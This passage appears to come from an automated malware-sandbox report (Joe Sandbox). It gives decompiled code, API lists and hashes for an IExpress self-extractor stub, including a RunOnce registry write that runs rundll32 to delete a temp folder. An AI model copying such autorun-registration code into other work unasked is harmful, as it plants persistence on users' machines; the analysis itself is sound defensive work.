                                                                                                                                                                                                                                              				if(_t66 == 0) {
                                                                                                                                                                                                                                              					_t63 = 0x4c2;
                                                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                                                              					E001A44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                              				_v12 = _t26;
                                                                                                                                                                                                                                              				if(_t26 == 0) {
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					FreeLibrary(_t66);
                                                                                                                                                                                                                                              					_t63 = 0x4c1;
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                              				_v20 = _t28;
                                                                                                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                              				_v16 = _t29;
                                                                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t76 =  *0x1a88c0; // 0x0
                                                                                                                                                                                                                                              				if(_t76 != 0) {
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					 *0x1a87a0 = 0;
                                                                                                                                                                                                                                              					_v52 = _t67;
                                                                                                                                                                                                                                              					_v48 = 0;
                                                                                                                                                                                                                                              					_v44 = 0;
                                                                                                                                                                                                                                              					_v40 = 0x1a8598;
                                                                                                                                                                                                                                              					_v36 = 1;
                                                                                                                                                                                                                                              					_v32 = E001A4200;
                                                                                                                                                                                                                                              					_v28 = 0x1a88c0;
                                                                                                                                                                                                                                              					 *0x1aa288( &_v52);
                                                                                                                                                                                                                                              					_t32 =  *_v12();
                                                                                                                                                                                                                                              					if(_t71 != _t71) {
                                                                                                                                                                                                                                              						asm("int 0x29");
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_v12 = _t32;
                                                                                                                                                                                                                                              					if(_t32 != 0) {
                                                                                                                                                                                                                                              						 *0x1aa288(_t32, 0x1a88c0);
                                                                                                                                                                                                                                              						 *_v16();
                                                                                                                                                                                                                                              						if(_t71 != _t71) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if( *0x1a88c0 != 0) {
                                                                                                                                                                                                                                              							E001A1680(0x1a87a0, 0x104, 0x1a88c0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0x1aa288(_v12);
                                                                                                                                                                                                                                              						 *_v20();
                                                                                                                                                                                                                                              						if(_t71 != _t71) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					FreeLibrary(_t66);
                                                                                                                                                                                                                                              					_t85 =  *0x1a87a0; // 0x0
                                                                                                                                                                                                                                              					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					GetTempPathA(0x104, 0x1a88c0);
                                                                                                                                                                                                                                              					_t61 = 0x1a88c0;
                                                                                                                                                                                                                                              					_t4 =  &(_t61[1]); // 0x1a88c1
                                                                                                                                                                                                                                              					_t65 = _t4;
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t42 =  *_t61;
                                                                                                                                                                                                                                              						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                              					} while (_t42 != 0);
                                                                                                                                                                                                                                              					_t5 = _t61 - _t65 + 0x1a88c0; // 0x351181
                                                                                                                                                                                                                                              					_t44 = CharPrevA(0x1a88c0, _t5);
                                                                                                                                                                                                                                              					_v8 = _t44;
                                                                                                                                                                                                                                              					if( *_t44 == 0x5c &&  *(CharPrevA(0x1a88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                              						 *_v8 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}




























                                                                                                                                                                                                                                              0x001a4234
                                                                                                                                                                                                                                              0x001a423c
                                                                                                                                                                                                                                              0x001a4240
                                                                                                                                                                                                                                              0x001a43b2
                                                                                                                                                                                                                                              0x001a43b7
                                                                                                                                                                                                                                              0x001a43c0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a43c5
                                                                                                                                                                                                                                              0x001a424c
                                                                                                                                                                                                                                              0x001a4252
                                                                                                                                                                                                                                              0x001a4257
                                                                                                                                                                                                                                              0x001a43a4
                                                                                                                                                                                                                                              0x001a43a5
                                                                                                                                                                                                                                              0x001a43ab
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a43ab
                                                                                                                                                                                                                                              0x001a4263
                                                                                                                                                                                                                                              0x001a4269
                                                                                                                                                                                                                                              0x001a426e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a427a
                                                                                                                                                                                                                                              0x001a4280
                                                                                                                                                                                                                                              0x001a4285
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a428d
                                                                                                                                                                                                                                              0x001a4293
                                                                                                                                                                                                                                              0x001a42e6
                                                                                                                                                                                                                                              0x001a42e9
                                                                                                                                                                                                                                              0x001a42ef
                                                                                                                                                                                                                                              0x001a42f4
                                                                                                                                                                                                                                              0x001a42f7
                                                                                                                                                                                                                                              0x001a4300
                                                                                                                                                                                                                                              0x001a4307
                                                                                                                                                                                                                                              0x001a430e
                                                                                                                                                                                                                                              0x001a4315
                                                                                                                                                                                                                                              0x001a431c
                                                                                                                                                                                                                                              0x001a4322
                                                                                                                                                                                                                                              0x001a4326
                                                                                                                                                                                                                                              0x001a432d
                                                                                                                                                                                                                                              0x001a432d
                                                                                                                                                                                                                                              0x001a432f
                                                                                                                                                                                                                                              0x001a4334
                                                                                                                                                                                                                                              0x001a4343
                                                                                                                                                                                                                                              0x001a4349
                                                                                                                                                                                                                                              0x001a434d
                                                                                                                                                                                                                                              0x001a4354
                                                                                                                                                                                                                                              0x001a4354
                                                                                                                                                                                                                                              0x001a435d
                                                                                                                                                                                                                                              0x001a436e
                                                                                                                                                                                                                                              0x001a436e
                                                                                                                                                                                                                                              0x001a437d
                                                                                                                                                                                                                                              0x001a4383
                                                                                                                                                                                                                                              0x001a4387
                                                                                                                                                                                                                                              0x001a438e
                                                                                                                                                                                                                                              0x001a438e
                                                                                                                                                                                                                                              0x001a4387
                                                                                                                                                                                                                                              0x001a4391
                                                                                                                                                                                                                                              0x001a4399
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4295
                                                                                                                                                                                                                                              0x001a429f
                                                                                                                                                                                                                                              0x001a42a5
                                                                                                                                                                                                                                              0x001a42aa
                                                                                                                                                                                                                                              0x001a42aa
                                                                                                                                                                                                                                              0x001a42ad
                                                                                                                                                                                                                                              0x001a42ad
                                                                                                                                                                                                                                              0x001a42af
                                                                                                                                                                                                                                              0x001a42b0
                                                                                                                                                                                                                                              0x001a42b6
                                                                                                                                                                                                                                              0x001a42c2
                                                                                                                                                                                                                                              0x001a42c8
                                                                                                                                                                                                                                              0x001a42ce
                                                                                                                                                                                                                                              0x001a42e4
                                                                                                                                                                                                                                              0x001a42e4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a42ce

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 001A4236
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 001A424C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,000000C3), ref: 001A4263
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 001A427A
                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,001A88C0,?,00000001), ref: 001A429F
                                                                                                                                                                                                                                              • CharPrevA.USER32(001A88C0,00351181,?,00000001), ref: 001A42C2
                                                                                                                                                                                                                                              • CharPrevA.USER32(001A88C0,00000000,?,00000001), ref: 001A42D6
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001A4391
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001A43A5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                              • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                              • Opcode ID: e393a4b6b34dfb4fd68a027bccabcfe904c1155d3f28b12fe9f98fb2dd5caa8d
                                                                                                                                                                                                                                              • Instruction ID: c645402eb8dd84ca201ccdb294559f6d2f707ef19b3d5c8fd970fb17a887eb14
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e393a4b6b34dfb4fd68a027bccabcfe904c1155d3f28b12fe9f98fb2dd5caa8d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE41D4BCE00214AFDB119BA4DC94A7EBBB4EF8B344F540169E941A3251CFB98C41C761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E001A2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v269;
                                                                                                                                                                                                                                              				CHAR* _v276;
                                                                                                                                                                                                                                              				int _v280;
                                                                                                                                                                                                                                              				void* _v284;
                                                                                                                                                                                                                                              				int _v288;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                                                              				int _t45;
                                                                                                                                                                                                                                              				int* _t50;
                                                                                                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                                                                                                              				CHAR* _t61;
                                                                                                                                                                                                                                              				char* _t62;
                                                                                                                                                                                                                                              				int _t63;
                                                                                                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t52 = __ecx;
                                                                                                                                                                                                                                              				_t23 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                              				_t62 = _a4;
                                                                                                                                                                                                                                              				_t50 = 0;
                                                                                                                                                                                                                                              				_t61 = __ecx;
                                                                                                                                                                                                                                              				_v276 = _t62;
                                                                                                                                                                                                                                              				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                              				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                              					_t63 = 0x104;
                                                                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t64 = _t62 + 1;
                                                                                                                                                                                                                                              					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                              					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                              					_t63 = 0x104;
                                                                                                                                                                                                                                              					_t34 = _v269;
                                                                                                                                                                                                                                              					if(_t34 == 0x53) {
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_t34 == 0x57) {
                                                                                                                                                                                                                                              							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_push(_t52);
                                                                                                                                                                                                                                              							_v288 = 0x104;
                                                                                                                                                                                                                                              							E001A1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                              							_t59 = 0x104;
                                                                                                                                                                                                                                              							E001A658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                              							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                              								L16:
                                                                                                                                                                                                                                              								_t59 = _t63;
                                                                                                                                                                                                                                              								E001A658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								if(RegQueryValueExA(_v284, 0x1a1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                              									_t45 = _v280;
                                                                                                                                                                                                                                              									if(_t45 != 2) {
                                                                                                                                                                                                                                              										L9:
                                                                                                                                                                                                                                              										if(_t45 == 1) {
                                                                                                                                                                                                                                              											goto L10;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              											_t45 = _v280;
                                                                                                                                                                                                                                              											goto L9;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t59 = 0x104;
                                                                                                                                                                                                                                              											E001A1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                              											L10:
                                                                                                                                                                                                                                              											_t50 = 1;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								RegCloseKey(_v284);
                                                                                                                                                                                                                                              								L15:
                                                                                                                                                                                                                                              								if(_t50 == 0) {
                                                                                                                                                                                                                                              									goto L16;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                              			}























                                                                                                                                                                                                                                              0x001a2773
                                                                                                                                                                                                                                              0x001a277e
                                                                                                                                                                                                                                              0x001a2785
                                                                                                                                                                                                                                              0x001a278a
                                                                                                                                                                                                                                              0x001a278d
                                                                                                                                                                                                                                              0x001a2790
                                                                                                                                                                                                                                              0x001a2792
                                                                                                                                                                                                                                              0x001a2798
                                                                                                                                                                                                                                              0x001a279d
                                                                                                                                                                                                                                              0x001a28b2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a27a3
                                                                                                                                                                                                                                              0x001a27a3
                                                                                                                                                                                                                                              0x001a27af
                                                                                                                                                                                                                                              0x001a27c2
                                                                                                                                                                                                                                              0x001a27c8
                                                                                                                                                                                                                                              0x001a27cd
                                                                                                                                                                                                                                              0x001a27d5
                                                                                                                                                                                                                                              0x001a28b7
                                                                                                                                                                                                                                              0x001a28b9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a27db
                                                                                                                                                                                                                                              0x001a27dd
                                                                                                                                                                                                                                              0x001a28aa
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a27e3
                                                                                                                                                                                                                                              0x001a27e3
                                                                                                                                                                                                                                              0x001a27ec
                                                                                                                                                                                                                                              0x001a27f8
                                                                                                                                                                                                                                              0x001a2803
                                                                                                                                                                                                                                              0x001a280b
                                                                                                                                                                                                                                              0x001a2831
                                                                                                                                                                                                                                              0x001a28c3
                                                                                                                                                                                                                                              0x001a28c9
                                                                                                                                                                                                                                              0x001a28cd
                                                                                                                                                                                                                                              0x001a2837
                                                                                                                                                                                                                                              0x001a285a
                                                                                                                                                                                                                                              0x001a285c
                                                                                                                                                                                                                                              0x001a2865
                                                                                                                                                                                                                                              0x001a2892
                                                                                                                                                                                                                                              0x001a2895
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2867
                                                                                                                                                                                                                                              0x001a2878
                                                                                                                                                                                                                                              0x001a288c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a287a
                                                                                                                                                                                                                                              0x001a2880
                                                                                                                                                                                                                                              0x001a2885
                                                                                                                                                                                                                                              0x001a2897
                                                                                                                                                                                                                                              0x001a2899
                                                                                                                                                                                                                                              0x001a2899
                                                                                                                                                                                                                                              0x001a2878
                                                                                                                                                                                                                                              0x001a2865
                                                                                                                                                                                                                                              0x001a28a0
                                                                                                                                                                                                                                              0x001a28bf
                                                                                                                                                                                                                                              0x001a28c1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a28c1
                                                                                                                                                                                                                                              0x001a2831
                                                                                                                                                                                                                                              0x001a27dd
                                                                                                                                                                                                                                              0x001a27d5
                                                                                                                                                                                                                                              0x001a28e5

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharUpperA.USER32(56898003,00000000,00000000,00000000), ref: 001A27A8
                                                                                                                                                                                                                                              • CharNextA.USER32(0000054D), ref: 001A27B5
                                                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 001A27BC
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A2829
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,001A1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A2852
                                                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A2870
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A28A0
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 001A28AA
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 001A28B9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 001A27E4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                              • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                              • Opcode ID: 9955e002d83a40a54380675bdddafa1d0f02b77f25d9552e244c84110277c3e6
                                                                                                                                                                                                                                              • Instruction ID: 275a5a89afc70833ac51ffbd66a446534b3fa4e5d958962ff202fe9f5535e829
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9955e002d83a40a54380675bdddafa1d0f02b77f25d9552e244c84110277c3e6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B241A3B9A00128AFDB259B68DC85AFA77BDEF17700F0440A9F549D2100DB748EC6CFA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                                                                                                              			E001A2267() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v836;
                                                                                                                                                                                                                                              				void* _v840;
                                                                                                                                                                                                                                              				int _v844;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                                                              				intOrPtr* _t42;
                                                                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t19 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                              				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                              				if( *0x1a8530 != 0) {
                                                                                                                                                                                                                                              					_push(_t49);
                                                                                                                                                                                                                                              					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                              						_push(_t38);
                                                                                                                                                                                                                                              						_v844 = 0x238;
                                                                                                                                                                                                                                              						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                              							_push(_t47);
                                                                                                                                                                                                                                              							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                              							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              								E001A658A( &_v268, 0x104, 0x1a1140);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                              							E001A171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                              							_t42 =  &_v836;
                                                                                                                                                                                                                                              							_t45 = _t42 + 1;
                                                                                                                                                                                                                                              							_pop(_t47);
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t33 =  *_t42;
                                                                                                                                                                                                                                              								_t42 = _t42 + 1;
                                                                                                                                                                                                                                              							} while (_t33 != 0);
                                                                                                                                                                                                                                              							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                              						_pop(_t38);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_pop(_t49);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              0x001a2272
                                                                                                                                                                                                                                              0x001a2277
                                                                                                                                                                                                                                              0x001a2279
                                                                                                                                                                                                                                              0x001a2283
                                                                                                                                                                                                                                              0x001a2289
                                                                                                                                                                                                                                              0x001a22ab
                                                                                                                                                                                                                                              0x001a22b1
                                                                                                                                                                                                                                              0x001a22c4
                                                                                                                                                                                                                                              0x001a22e0
                                                                                                                                                                                                                                              0x001a22e6
                                                                                                                                                                                                                                              0x001a22f5
                                                                                                                                                                                                                                              0x001a230d
                                                                                                                                                                                                                                              0x001a231c
                                                                                                                                                                                                                                              0x001a231c
                                                                                                                                                                                                                                              0x001a2321
                                                                                                                                                                                                                                              0x001a233a
                                                                                                                                                                                                                                              0x001a2342
                                                                                                                                                                                                                                              0x001a2348
                                                                                                                                                                                                                                              0x001a234b
                                                                                                                                                                                                                                              0x001a234c
                                                                                                                                                                                                                                              0x001a234c
                                                                                                                                                                                                                                              0x001a234e
                                                                                                                                                                                                                                              0x001a234f
                                                                                                                                                                                                                                              0x001a236e
                                                                                                                                                                                                                                              0x001a236e
                                                                                                                                                                                                                                              0x001a237a
                                                                                                                                                                                                                                              0x001a2380
                                                                                                                                                                                                                                              0x001a2380
                                                                                                                                                                                                                                              0x001a2381
                                                                                                                                                                                                                                              0x001a2381
                                                                                                                                                                                                                                              0x001a238f

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 001A22A3
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 001A22D8
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 001A22F5
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 001A2305
                                                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 001A236E
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 001A237A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 001A2321
                                                                                                                                                                                                                                              • wextract_cleanup1, xrefs: 001A227C, 001A22CD, 001A2363
                                                                                                                                                                                                                                              • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 001A232D
                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 001A2299
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                                                              • API String ID: 3027380567-2601155950
                                                                                                                                                                                                                                              • Opcode ID: 8c94dc31e68a5a6cd103e68595d23f9d3d3adb12e84911782074e801b2ec93c1
                                                                                                                                                                                                                                              • Instruction ID: bf54f59d4734f983b2d298527dabea245df5a632d16bf47d60e160bea1c32f9b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c94dc31e68a5a6cd103e68595d23f9d3d3adb12e84911782074e801b2ec93c1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231C579A002186BDB219B64DD49FEB7B7CEF17710F4401A9F90DA6051EB70AB88CA50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                                              			E001A3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                                                                                                              				struct HWND__* _t33;
                                                                                                                                                                                                                                              				struct HWND__* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t8 = _a8 - 0xf;
